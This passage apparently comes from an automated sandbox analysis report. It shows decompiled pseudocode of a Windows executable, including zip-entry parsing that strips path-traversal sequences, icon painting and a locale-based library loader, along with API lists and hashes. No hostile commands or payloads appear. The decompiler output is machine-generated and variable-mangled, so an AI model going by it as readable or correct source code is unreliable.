					_t50 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
				_pop(_t93);
				_pop(_t96);
				_pop(_t75);
				return E0042569C(_t50, _t75,  *(_t98 + 0x140) ^ _t98, _t90, _t93, _t96);
			}

0x00421296
0x00421296
0x0042129d
0x004212a1
0x004212a8
0x004212ae
0x004212b5
0x004212c0
0x004212c6
0x004212cc
0x004212d8
0x004212da
0x004212da
0x004212da
0x004212e8
0x00000000
0x00000000
0x004212f6
0x004212fe
0x0042131d
0x0042131f
0x00000000
0x00421321
0x0042132a
0x0042132f
0x00421338
0x00421340
0x00421346
0x00421348
0x004213da
0x004213e0
0x004213e7
0x004213e7
0x0042134e
0x0042135e
0x00421364
0x00421366
0x0042137e
0x00421382
0x00421385
0x00421385
0x0042138b
0x0042138f
0x00000000
0x00421391
0x00421396
0x0042139c
0x0042139f
0x00000000
0x004213a1
0x004213a2
0x004213a8
0x004213ac
0x00000000
0x004213ae
0x004213ae
0x004213b1
0x00000000
0x004213b3
0x004213b7
0x004213c0
0x004213c4
0x004213c6
0x00000000
0x004213c8
0x004213cc
0x004213d2
0x00000000
0x004213d7
0x004213c6
0x004213b1
0x004213ac
0x0042139f
0x00421368
0x00421368
0x0042136c
0x00421371
0x00421377
0x00000000
0x00421377
0x00421366
0x00421348
0x00421300
0x00421305
0x0042130d
0x00421311
0x00421316
0x00421316
0x00421316
0x004213eb
0x004213f3
0x004213f4
0x004213f5
0x0042140a

APIs

__EH_prolog3.LIBCMT ref: 004212B5
GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 004212F6

Part of subcall function 00415838: __CxxThrowException@8.LIBCMT ref: 0041584C

PathIsUNCA.SHLWAPI(?,?,?,00000000), ref: 00421340
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0042135E
CharUpperA.USER32(?), ref: 00421385
FindFirstFileA.KERNEL32(?,00000000), ref: 00421396
FindClose.KERNEL32(00000000), ref: 004213A2
lstrlenA.KERNEL32(?), ref: 004213B7

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3InformationNameThrowUpperVolumelstrlen
String ID:
API String ID: 3249967234-0
Opcode ID: 3229c62922a96855c3a6700e6715c37928a20b2e9a94d9f2fe1bd77dbba2b880
Instruction ID: 10f9dfe8eb3e0447193dda21dd33110236a90c8cf13cd0c8911950e0aca7139e
Opcode Fuzzy Hash: 3229c62922a96855c3a6700e6715c37928a20b2e9a94d9f2fe1bd77dbba2b880
Instruction Fuzzy Hash: BE41A471A00119ABEB11EBB5ED45AFF777DEF14318F50012AFC15E22E1DB389905CA68

Uniqueness

Uniqueness Score: -1.00%

Function 00408E60, Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 408
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00408E60(intOrPtr* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v276;
				char _v540;
				unsigned int _v568;
				intOrPtr _v592;
				intOrPtr _v596;
				unsigned int _v604;
				unsigned int _v620;
				struct _FILETIME _v628;
				struct _FILETIME _v636;
				intOrPtr* _v640;
				char _v644;
				char _v646;
				char _v647;
				char _v648;
				void* _v652;
				void* _v653;
				signed int _v660;
				signed char _v661;
				signed int _v662;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t157;
				intOrPtr _t159;
				signed int _t165;
				signed int _t171;
				void* _t172;
				void* _t174;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t180;
				unsigned int _t181;
				signed char _t183;
				long _t186;
				long _t189;
				signed int _t190;
				signed int _t195;
				signed char _t197;
				signed int _t198;
				intOrPtr _t209;
				intOrPtr _t217;
				void* _t233;
				void* _t235;
				signed char _t240;
				char _t241;
				void* _t242;
				void* _t243;
				void* _t244;
				void* _t245;
				signed int _t256;
				signed int _t257;
				signed char _t260;
				intOrPtr _t269;
				signed char _t279;
				signed int _t286;
				signed int _t287;
				signed int _t308;
				signed char _t312;
				signed int _t319;
				signed int _t320;
				intOrPtr* _t322;
				void* _t323;
				void* _t324;
				intOrPtr* _t326;
				signed int _t328;
				void* _t333;
				void* _t334;
				void* _t335;
				void* _t339;
				intOrPtr* _t341;
				void* _t342;
				intOrPtr _t343;
				void* _t344;
				intOrPtr _t345;
				void* _t346;
				void* _t347;
				signed int _t349;
				void* _t350;
				void* _t352;
				void* _t354;
				void* _t355;
				signed int _t356;
				signed int _t358;
				signed int _t359;
				void* _t361;

				_t299 = __edx;
				_t358 = (_t356 & 0xfffffff8) - 0x294;
				_t157 =  *0x44f5d0; // 0x765b253d
				_v8 = _t157 ^ _t358;
				_t159 = _a4;
				_t322 = __ecx;
				_t341 = __edx;
				_v640 = __ecx;
				_v652 = __edx;
				if(_t159 < 0xffffffff) {
					L72:
					_pop(_t323);
					_pop(_t342);
					_pop(_t233);
					__eflags = _v8 ^ _t358;
					return E0042569C(0x10000, _t233, _v8 ^ _t358, _t299, _t323, _t342);
				} else {
					_t234 =  *__ecx;
					if(_t159 >=  *((intOrPtr*)( *__ecx + 4))) {
						goto L72;
					} else {
						if( *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
							E00408BD0(_t234, __edx, _t355);
							_t159 = _a4;
						}
						 *((intOrPtr*)(_t322 + 4)) = 0xffffffff;
						if(_t159 !=  *((intOrPtr*)(_t322 + 0x134))) {
							__eflags = _t159 - 0xffffffff;
							if(_t159 != 0xffffffff) {
								_t343 =  *_t322;
								__eflags = _t159 -  *((intOrPtr*)(_t343 + 0x10));
								if(_t159 <  *((intOrPtr*)(_t343 + 0x10))) {
									E004085A0(_t343);
									_t159 = _a4;
								}
								__eflags =  *((intOrPtr*)( *_t322 + 0x10)) - _t159;
								while(__eflags < 0) {
									E004085E0( *_t322);
									__eflags =  *((intOrPtr*)( *_t322 + 0x10)) - _a4;
								}
								E00408580( &_v540,  &_v620,  *_t322);
								_t303 =  *_t322;
								_t165 = E00408640(__eflags,  *_t322,  &_v648,  &_v660,  &_v644);
								_t359 = _t358 + 0x10;
								__eflags = _t165;
								if(_t165 == 0) {
									_t304 = 0;
									__eflags = E00407DE0( *((intOrPtr*)( *_t322)), _v660, 0);
									if(__eflags != 0) {
										L19:
										_pop(_t324);
										_pop(_t344);
										_pop(_t235);
										__eflags = _v8 ^ _t359;
										return E0042569C(0x800, _t235, _v8 ^ _t359, _t304, _t324, _t344);
									} else {
										_t345 = _v644;
										_t171 = E0040A3F7(__eflags, _t345);
										_t325 =  *((intOrPtr*)( *_t322));
										_v660 = _t171;
										_t172 = E00407E70(1, _t171,  *((intOrPtr*)( *_t322)), _t355, _t345);
										_t361 = _t359 + 8;
										__eflags = _t172 - _t345;
										if(__eflags == 0) {
											_t346 = _v652;
											 *_t346 =  *( *_v640 + 0x10);
											_t174 = 0;
											do {
												_t256 =  *((intOrPtr*)(_t361 + _t174 + 0x88));
												 *((char*)(_t361 + _t174 + 0x190)) = _t256;
												_t174 = _t174 + 1;
												__eflags = _t256;
											} while (_t256 != 0);
											_t326 =  &_v276;
											while(1) {
												_t175 =  *_t326;
												__eflags = _t175;
												if(_t175 == 0) {
													goto L26;
												}
												L24:
												__eflags =  *((intOrPtr*)(_t326 + 1)) - 0x3a;
												if( *((intOrPtr*)(_t326 + 1)) == 0x3a) {
													_t326 = _t326 + 2;
													while(1) {
														_t175 =  *_t326;
														__eflags = _t175;
														if(_t175 == 0) {
															goto L26;
														}
														goto L24;
													}
												}
												L26:
												__eflags = _t175 - 0x5c;
												if(_t175 == 0x5c) {
													_t326 = _t326 + 1;
													while(1) {
														_t175 =  *_t326;
														__eflags = _t175;
														if(_t175 == 0) {
															goto L26;
														}
														goto L24;
													}
												}
												__eflags = _t175 - 0x2f;
												if(_t175 == 0x2f) {
													_t326 = _t326 + 1;
													while(1) {
														_t175 =  *_t326;
														__eflags = _t175;
														if(_t175 == 0) {
															goto L26;
														}
														goto L24;
													}
												}
												_t176 = E00426A8C(_t326, "\\..\\");
												_t361 = _t361 + 8;
												__eflags = _t176;
												if(_t176 != 0) {
													_t51 = _t176 + 4; // 0x4
													_t326 = _t51;
													while(1) {
														_t175 =  *_t326;
														__eflags = _t175;
														if(_t175 == 0) {
															goto L26;
														}
														goto L24;
													}
												}
												_t177 = E00426A8C(_t326, "\\../");
												_t361 = _t361 + 8;
												__eflags = _t177;
												if(_t177 != 0) {
													_t52 = _t177 + 4; // 0x4
													_t326 = _t52;
													while(1) {
														_t175 =  *_t326;
														__eflags = _t175;
														if(_t175 == 0) {
															goto L26;
														}
														goto L24;
													}
												}
												_t178 = E00426A8C(_t326, "/../");
												_t361 = _t361 + 8;
												__eflags = _t178;
												if(_t178 != 0) {
													_t53 = _t178 + 4; // 0x4
													_t326 = _t53;
													while(1) {
														_t175 =  *_t326;
														__eflags = _t175;
														if(_t175 == 0) {
															goto L26;
														}
														goto L24;
													}
													goto L26;
												}
												_t179 = E00426A8C(_t326, "/..\\");
												_t361 = _t361 + 8;
												__eflags = _t179;
												if(_t179 != 0) {
													_t54 = _t179 + 4; // 0x4
													_t326 = _t54;
													continue;
												}
												_t180 = _t326;
												_t308 = _t346 + 4 - _t326;
												__eflags = _t308;
												do {
													_t257 =  *_t180;
													 *((char*)(_t308 + _t180)) = _t257;
													_t180 = _t180 + 1;
													__eflags = _t257;
												} while (_t257 != 0);
												_t181 = _v568;
												_t260 = _t181 >> 0x0000001e & 0x00000001;
												_t312 =  !(_t181 >> 0x17) & 0x00000001;
												_t328 = _v620 >> 8;
												__eflags = _t328;
												_v653 = 0;
												_v662 = 0;
												_v661 = 1;
												if(_t328 == 0) {
													L44:
													_v662 = _t181 >> 0x00000002 & 0x00000001;
													_t312 = _t181 & 0x00000001;
													_t240 = _t181 >> 0x00000001 & 0x00000001;
													_t260 = _t181 >> 0x00000004 & 0x00000001;
													_t183 = _t181 >> 0x00000005 & 0x00000001;
												} else {
													__eflags = _t328 - 7;
													if(_t328 == 7) {
														goto L44;
													} else {
														__eflags = _t328 - 0xb;
														if(_t328 == 0xb) {
															goto L44;
														} else {
															__eflags = _t328 - 0xe;
															if(_t328 != 0xe) {
																_t240 = _v653;
																_t183 = _v661;
															} else {
																goto L44;
															}
														}
													}
												}
												__eflags = _t260;
												 *(_t346 + 0x108) = 0;
												if(_t260 != 0) {
													 *(_t346 + 0x108) = 0x10;
												}
												__eflags = _t183;
												if(_t183 != 0) {
													_t67 = _t346 + 0x108;
													 *_t67 =  *(_t346 + 0x108) | 0x00000020;
													__eflags =  *_t67;
												}
												__eflags = _t240;
												if(_t240 != 0) {
													_t69 = _t346 + 0x108;
													 *_t69 =  *(_t346 + 0x108) | 0x00000002;
													__eflags =  *_t69;
												}
												__eflags = _t312;
												if(_t312 != 0) {
													_t71 = _t346 + 0x108;
													 *_t71 =  *(_t346 + 0x108) | 0x00000001;
													__eflags =  *_t71;
												}
												__eflags = _v662;
												if(_v662 != 0) {
													_t74 = _t346 + 0x108;
													 *_t74 =  *(_t346 + 0x108) | 0x00000004;
													__eflags =  *_t74;
												}
												 *((intOrPtr*)(_t346 + 0x124)) = _v596;
												 *((intOrPtr*)(_t346 + 0x128)) = _v592;
												_t186 = E00408C80(_v604, _v604 >> 0x10);
												_v628.dwHighDateTime = _t312;
												_t314 =  &_v636;
												_v628.dwLowDateTime = _t186;
												LocalFileTimeToFileTime( &_v628,  &_v636);
												_t189 = _v636.dwLowDateTime;
												_t269 = _v636.dwHighDateTime;
												_t241 = 0;
												__eflags = _v644 - 4;
												 *(_t346 + 0x10c) = _t189;
												 *((intOrPtr*)(_t346 + 0x110)) = _t269;
												 *(_t346 + 0x114) = _t189;
												 *((intOrPtr*)(_t346 + 0x118)) = _t269;
												 *(_t346 + 0x11c) = _t189;
												 *((intOrPtr*)(_t346 + 0x120)) = _t269;
												if(_v644 > 4) {
													_v646 = 0;
													while(1) {
														_t195 = _v660;
														_v648 =  *((intOrPtr*)(_t241 + _t195));
														_t328 = "UT";
														__eflags = 0;
														_v647 =  *((intOrPtr*)(_t195 + _t241 + 1));
														asm("repe cmpsb");
														if(0 == 0) {
															break;
														}
														_t314 =  *(_t241 + _v660 + 2) & 0x000000ff;
														_t241 = _t241 + ( *(_t241 + _v660 + 2) & 0x000000ff) + 4;
														__eflags = _t241 + 4 - _v644;
														if(_t241 + 4 < _v644) {
															continue;
														} else {
														}
														L68:
														_t346 = _v652;
														goto L69;
													}
													_t349 = _v660;
													_t197 =  *(_t241 + _t349 + 4) & 0x000000ff;
													_t279 = _t197 >> 0x00000001 & 0x00000001;
													_t314 = _t197 >> 0x00000002 & 0x00000001;
													_t241 = _t241 + 5;
													__eflags = _t197 & 0x00000001;
													_v661 = _t279;
													_v662 = _t314;
													if((_t197 & 0x00000001) == 0) {
														_t328 = _v652;
													} else {
														_t287 =  *(_t241 + _t349 + 1) & 0x000000ff;
														_t320 =  *(_t241 + _t349) & 0x000000ff;
														_t241 = _t241 + 4;
														_t217 = E00408C60((0 << 0x00000008 | _t287) << 0x00000008 | _t320, _t320);
														_t328 = _v652;
														_t279 = _v661;
														 *(_t328 + 0x120) = _t320;
														_t314 = _v662;
														 *((intOrPtr*)(_t328 + 0x11c)) = _t217;
													}
													__eflags = _t279;
													if(_t279 != 0) {
														_t286 =  *(_t241 + _t349 + 1) & 0x000000ff;
														_t319 =  *(_t241 + _t349) & 0x000000ff;
														_t241 = _t241 + 4;
														__eflags = 0 << 8;
														_t209 = E00408C60((0 << 0x00000008 | _t286) << 0x00000008 | _t319, _t319);
														 *(_t328 + 0x110) = _t319;
														_t314 = _v662;
														 *((intOrPtr*)(_t328 + 0x10c)) = _t209;
													}
													__eflags = _t314;
													if(_t314 != 0) {
														_t198 = _t349;
														_t314 =  *(_t241 + _t198 + 1) & 0x000000ff;
														__eflags =  *(_t241 + _t198) & 0x000000ff | (0 << 0x00000008 | _t314) << 0x00000008;
														 *((intOrPtr*)(_t328 + 0x114)) = E00408C60( *(_t241 + _t198) & 0x000000ff | (0 << 0x00000008 | _t314) << 0x00000008, _t314);
														 *(_t328 + 0x118) = _t314;
													}
													goto L68;
												}
												L69:
												_t190 = _v660;
												__eflags = _t190;
												if(__eflags != 0) {
													_push(_t190);
													E0040A3F2(_t241, _t314, _t328, _t346, __eflags);
													_t361 = _t361 + 4;
												}
												memcpy(_v640 + 8, _t346, 0x4b << 2);
												 *((intOrPtr*)(_v640 + 0x134)) = _a4;
												_pop(_t333);
												_pop(_t347);
												_pop(_t242);
												__eflags = _v8 ^ _t361 + 0xc;
												return E0042569C(0, _t242, _v8 ^ _t361 + 0xc, _v640, _t333, _t347);
												goto L73;
											}
										} else {
											_t304 = _v660;
											_push(_v660);
											E0040A3F2(1, _v660, _t325, _t345, __eflags);
											_t359 = _t361 + 4;
											goto L19;
										}
									}
								} else {
									_pop(_t334);
									_pop(_t350);
									_pop(_t243);
									__eflags = _v8 ^ _t359;
									return E0042569C(0x700, _t243, _v8 ^ _t359, _t303, _t334, _t350);
								}
							} else {
								goto L8;
							}
						} else {
							if(_t159 == 0xffffffff) {
								L8:
								 *_t341 =  *((intOrPtr*)( *_t322 + 4));
								 *((char*)(_t341 + 4)) = 0;
								 *((intOrPtr*)(_t341 + 0x108)) = 0;
								 *((intOrPtr*)(_t341 + 0x10c)) = 0;
								 *((intOrPtr*)(_t341 + 0x110)) = 0;
								 *((intOrPtr*)(_t341 + 0x114)) = 0;
								 *((intOrPtr*)(_t341 + 0x118)) = 0;
								 *((intOrPtr*)(_t341 + 0x11c)) = 0;
								 *((intOrPtr*)(_t341 + 0x120)) = 0;
								 *((intOrPtr*)(_t341 + 0x124)) = 0;
								 *((intOrPtr*)(_t341 + 0x128)) = 0;
								_pop(_t335);
								_pop(_t352);
								_pop(_t244);
								__eflags = _v8 ^ _t358;
								return E0042569C(0, _t244, _v8 ^ _t358, _t299, _t335, _t352);
							} else {
								memcpy(_v652, _t322 + 8, 0x4b << 2);
								_pop(_t339);
								_pop(_t354);
								_pop(_t245);
								return E0042569C(0, _t245, _v8 ^ _t358 + 0xc, _t299, _t339, _t354);
							}
						}
					}
				}
				L73:
			}

0x00408e60
0x00408e66
0x00408e6c
0x00408e73
0x00408e7a
0x00408e83
0x00408e85
0x00408e87
0x00408e8b
0x00408e8f
0x0040937d
0x00409384
0x00409385
0x00409386
0x00409387
0x00409396
0x00408e95
0x00408e95
0x00408e9a
0x00000000
0x00408ea0
0x00408ea4
0x00408ea6
0x00408eab
0x00408eab
0x00408eb4
0x00408ebb
0x00408ee9
0x00408eec
0x00408f48
0x00408f4a
0x00408f4d
0x00408f4f
0x00408f54
0x00408f54
0x00408f59
0x00408f5c
0x00408f62
0x00408f6c
0x00408f6c
0x00408f7e
0x00408f88
0x00408f95
0x00408f9a
0x00408f9d
0x00408f9f
0x00408fc5
0x00408fcc
0x00408fce
0x00409006
0x0040900b
0x0040900c
0x0040900d
0x00409015
0x0040901f
0x00408fd0
0x00408fd0
0x00408fd5
0x00408fdc
0x00408fe9
0x00408fed
0x00408ff2
0x00408ff5
0x00408ff7
0x0040902b
0x0040902f
0x00409031
0x00409040
0x00409040
0x00409047
0x0040904e
0x00409051
0x00409051
0x00409055
0x00409060
0x00409060
0x00409062
0x00409064
0x00000000
0x00000000
0x00409066
0x00409066
0x00409069
0x0040906b
0x00409060
0x00409060
0x00409062
0x00409064
0x00000000
0x00000000
0x00000000
0x00409064
0x00409060
0x00409070
0x00409070
0x00409072
0x00409074
0x00409060
0x00409060
0x00409062
0x00409064
0x00000000
0x00000000
0x00000000
0x00409064
0x00409060
0x00409079
0x0040907b
0x0040907d
0x00409060
0x00409060
0x00409062
0x00409064
0x00000000
0x00000000
0x00000000
0x00409064
0x00409060
0x00409088
0x0040908d
0x00409090
0x00409092
0x00409094
0x00409094
0x00409060
0x00409060
0x00409062
0x00409064
0x00000000
0x00000000
0x00000000
0x00409064
0x00409060
0x0040909f
0x004090a4
0x004090a7
0x004090a9
0x004090ab
0x004090ab
0x00409060
0x00409060
0x00409062
0x00409064
0x00000000
0x00000000
0x00000000
0x00409064
0x00409060
0x004090b6
0x004090bb
0x004090be
0x004090c0
0x004090c2
0x004090c2
0x00409060
0x00409060
0x00409062
0x00409064
0x00000000
0x00000000
0x00000000
0x00409064
0x00000000
0x00409060
0x004090cd
0x004090d2
0x004090d5
0x004090d7
0x004090d9
0x004090d9
0x00000000
0x004090d9
0x004090e1
0x004090e3
0x004090e3
0x004090e5
0x004090e5
0x004090e7
0x004090ea
0x004090ed
0x004090ed
0x004090f1
0x00409105
0x00409108
0x0040910b
0x0040910b
0x0040910e
0x00409113
0x00409118
0x0040911d
0x0040912e
0x00409136
0x00409148
0x0040914b
0x0040914e
0x00409151
0x0040911f
0x0040911f
0x00409122
0x00000000
0x00409124
0x00409124
0x00409127
0x00000000
0x00409129
0x00409129
0x0040912c
0x00409155
0x00409159
0x00000000
0x00000000
0x00000000
0x0040912c
0x00409127
0x00409122
0x0040915d
0x0040915f
0x00409169
0x0040916b
0x0040916b
0x00409175
0x00409177
0x00409179
0x00409179
0x00409179
0x00409179
0x00409180
0x00409182
0x00409184
0x00409184
0x00409184
0x00409184
0x0040918b
0x0040918d
0x0040918f
0x0040918f
0x0040918f
0x0040918f
0x00409196
0x0040919b
0x0040919d
0x0040919d
0x0040919d
0x0040919d
0x004091ac
0x004091b6
0x004091c1
0x004091c6
0x004091ca
0x004091ce
0x004091d8
0x004091de
0x004091e2
0x004091e6
0x004091e8
0x004091ed
0x004091f3
0x004091f9
0x004091ff
0x00409205
0x0040920b
0x00409211
0x00409217
0x0040921b
0x0040921b
0x00409226
0x0040922a
0x00409238
0x0040923a
0x0040923e
0x00409240
0x00000000
0x00000000
0x00409246
0x0040924b
0x00409252
0x00409256
0x00000000
0x00000000
0x00409258
0x00409334
0x00409334
0x00000000
0x00409334
0x0040925d
0x00409261
0x0040926f
0x00409272
0x00409275
0x00409278
0x0040927a
0x0040927e
0x00409282
0x004092c3
0x00409284
0x00409284
0x00409289
0x00409293
0x004092a4
0x004092a9
0x004092ad
0x004092b1
0x004092b7
0x004092bb
0x004092bb
0x004092c7
0x004092c9
0x004092cb
0x004092d0
0x004092da
0x004092e9
0x004092eb
0x004092f0
0x004092f6
0x004092fa
0x004092fa
0x00409300
0x00409302
0x00409306
0x0040930c
0x00409321
0x00409328
0x0040932e
0x0040932e
0x00000000
0x00409302
0x00409338
0x00409338
0x0040933c
0x0040933e
0x00409340
0x00409341
0x00409346
0x00409346
0x00409359
0x0040935e
0x00409366
0x00409367
0x00409368
0x00409370
0x0040937a
0x00000000
0x0040937a
0x00408ff9
0x00408ff9
0x00408ffd
0x00408ffe
0x00409003
0x00000000
0x00409003
0x00408ff7
0x00408fa1
0x00408fa6
0x00408fa7
0x00408fa8
0x00408fb0
0x00408fba
0x00408fba
0x00000000
0x00000000
0x00000000
0x00408ebd
0x00408ec0
0x00408eee
0x00408ef5
0x00408ef7
0x00408efb
0x00408f01
0x00408f07
0x00408f0d
0x00408f13
0x00408f19
0x00408f1f
0x00408f25
0x00408f2b
0x00408f31
0x00408f32
0x00408f33
0x00408f3b
0x00408f45
0x00408ec2
0x00408ece
0x00408ed2
0x00408ed3
0x00408ed4
0x00408ee6
0x00408ee6
0x00408ec0
0x00408ebb
0x00408e9a
0x00000000

Strings

8LD, xrefs: 0040922A
/../, xrefs: 004090B0
\..\, xrefs: 00409082
/..\, xrefs: 004090C7
\../, xrefs: 00409099

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: /../$/..\$8LD$\../$\..\
API String ID: 0-4077056579
Opcode ID: 39db1bd6d2466786b523c6ff848bac2d61d2d115ebc08fcebb07c97022d9b047
Instruction ID: c8e3f3248c0aaf27816c1d310a667df91f17b6ab37c247148504d3ab28add2b7
Opcode Fuzzy Hash: 39db1bd6d2466786b523c6ff848bac2d61d2d115ebc08fcebb07c97022d9b047
Instruction Fuzzy Hash: 8FF1F1716087418FD714CF38C4817ABBBE1AF99304F54896EE8D9A7382D738E905CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004013B0, Relevance: 9.1, APIs: 6, Instructions: 81
windowCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E004013B0(void* __ecx) {
				signed int _v8;
				signed int _v12;
				int _v100;
				char _v104;
				struct tagRECT _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t17;
				int _t20;
				void* _t21;
				int _t25;
				int _t26;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t48;
				void* _t59;
				void* _t62;
				void* _t63;
				void* _t66;
				void* _t68;
				void* _t69;
				void* _t70;
				signed int _t71;
				signed int _t73;

				_t73 = (_t71 & 0xfffffff8) - 0x74;
				_t17 =  *0x44f5d0; // 0x765b253d
				_v8 = _t17 ^ _t73;
				_push(_t45);
				_t68 = __ecx;
				_push(_t62);
				_t20 = IsIconic( *(__ecx + 0x20));
				_t74 = _t20;
				if(_t20 == 0) {
					_t21 = E0040C0AE(_t45, _t68, _t62, _t68, __eflags);
					_pop(_t63);
					_pop(_t69);
					_pop(_t46);
					__eflags = _v8 ^ _t73;
					return E0042569C(_t21, _t46, _v8 ^ _t73, _t59, _t63, _t69);
				} else {
					E00414297(_t45,  &_v100, _t62, _t68, _t74);
					SendMessageA( *(_t68 + 0x20), 0x27, _v100, 0);
					_t25 = GetSystemMetrics(0xb);
					_t26 = GetSystemMetrics(0xc);
					GetClientRect( *(_t68 + 0x20),  &_v120);
					_t61 =  *(_t68 + 0x74);
					asm("cdq");
					asm("cdq");
					DrawIcon(_v100, _v120.right - _v120.left - _t25 + 1 -  *(_t68 + 0x74) >> 1, _v120.bottom - _v120.top - _t26 + 1 -  *(_t68 + 0x74) >> 1, _t61);
					_t43 = E004142EB(_t25,  &_v104, _t26, _t68, _t74);
					_t66 = _t68;
					_pop(_t70);
					_pop(_t48);
					return E0042569C(_t43, _t48, _v12 ^ _t73, _t61, _t66, _t70);
				}
			}

0x004013b6
0x004013b9
0x004013c0
0x004013c4
0x004013c6
0x004013cb
0x004013cd
0x004013d3
0x004013d5
0x0040146b
0x00401474
0x00401475
0x00401476
0x00401477
0x00401481
0x004013db
0x004013e0
0x004013f2
0x00401400
0x00401406
0x00401413
0x00401421
0x0040142a
0x0040143d
0x00401448
0x00401452
0x00401457
0x00401458
0x00401459
0x00401468
0x00401468

APIs

IsIconic.USER32(?), ref: 004013CD

Part of subcall function 00414297: __EH_prolog3.LIBCMT ref: 0041429E
Part of subcall function 00414297: BeginPaint.USER32(?,?,00000004,0040C0C5,?,00000058,00401470), ref: 004142CA

SendMessageA.USER32(?,00000027,?,00000000), ref: 004013F2
GetSystemMetrics.USER32 ref: 00401400
GetSystemMetrics.USER32 ref: 00401406
GetClientRect.USER32 ref: 00401413
DrawIcon.USER32 ref: 00401448

Part of subcall function 004142EB: __EH_prolog3.LIBCMT ref: 004142F2
Part of subcall function 004142EB: EndPaint.USER32(?,?,00000004,0040C0EB,?,?,00000058,00401470), ref: 0041430D

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3MetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
String ID:
API String ID: 2914073315-0
Opcode ID: 15a6f52d1ca93dfd04c96af9e3561332f0309d6209a4cafd982740c04d2b288d
Instruction ID: ac467c485ee73a3b1d8e19dd60be8aaedad384b2c123b2c6d785f25081db479c
Opcode Fuzzy Hash: 15a6f52d1ca93dfd04c96af9e3561332f0309d6209a4cafd982740c04d2b288d
Instruction Fuzzy Hash: 53216D727046009BC310EF79EC4AD6BB7E9FBC8614F044A2DF599C3290DA34F8048A5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA97, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70
libraryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040AA97(void* __ecx, void* __edx, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				intOrPtr* _t18;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t34;
				void* _t35;
				signed int _t36;
				void* _t37;

				_t32 = __edx;
				_t9 =  *0x44f5d0; // 0x765b253d
				_v8 = _t9 ^ _t36;
				_t39 = _a4 - 0x800;
				_t35 = __ecx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					E004054F0(E004275EC(__edx,  &_v288, 4, "LOC"));
					_t37 = _t37 + 0x10;
					L2:
					_push(_t26);
					_push(_t33);
					_t34 =  *(E00427761(_t39));
					 *(E00427761(_t39)) =  *_t14 & 0x00000000;
					_t35 = 0x112;
					_t27 = E00427707( &_v284, 0x112, 0x111, 0x112,  &_v288);
					_t18 = E00427761(_t39);
					_t40 =  *_t18;
					if( *_t18 == 0) {
						 *(E00427761(__eflags)) = _t34;
					} else {
						E0040AA2B( *((intOrPtr*)(E00427761(_t40))));
					}
					if(_t27 == 0xffffffff || _t27 >= _t35) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
					_pop(_t33);
					_pop(_t26);
				}
				return E0042569C(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
			}

0x0040aa97
0x0040aaa0
0x0040aaa7
0x0040aaaa
0x0040aab2
0x0040aaba
0x0040ab2e
0x0040ab30
0x00000000
0x00000000
0x0040ab32
0x0040aabc
0x0040aaca
0x0040aacf
0x0040aad2
0x0040aad2
0x0040aad3
0x0040aad9
0x0040aae0
0x0040aaf0
0x0040ab05
0x0040ab07
0x0040ab0c
0x0040ab0f
0x0040ab39
0x0040ab11
0x0040ab18
